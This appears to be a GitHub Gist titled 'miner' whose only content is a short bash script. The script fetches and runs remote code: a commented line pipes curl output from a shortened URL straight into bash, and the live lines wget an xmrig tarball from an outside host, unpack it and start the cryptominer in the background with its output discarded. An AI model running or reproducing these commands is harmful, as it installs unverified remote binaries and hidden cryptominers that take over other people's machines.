Last active
May 26, 2018 03:32
-
-
Save tiancheng91/4722266e5fb8b9d2b5e188cc6ba5bcd4 to your computer and use it in GitHub Desktop.
miner
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
""" | |
curl -L git.io/xmrig | bash | |
""" | |
wget http://tools.uu9.org/xmrig.tar.gz && tar -zxvf xmrig.tar.gz | |
cd xmrig | |
nohup ./xmrig -c config.json > /dev/null 2>&1 & |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment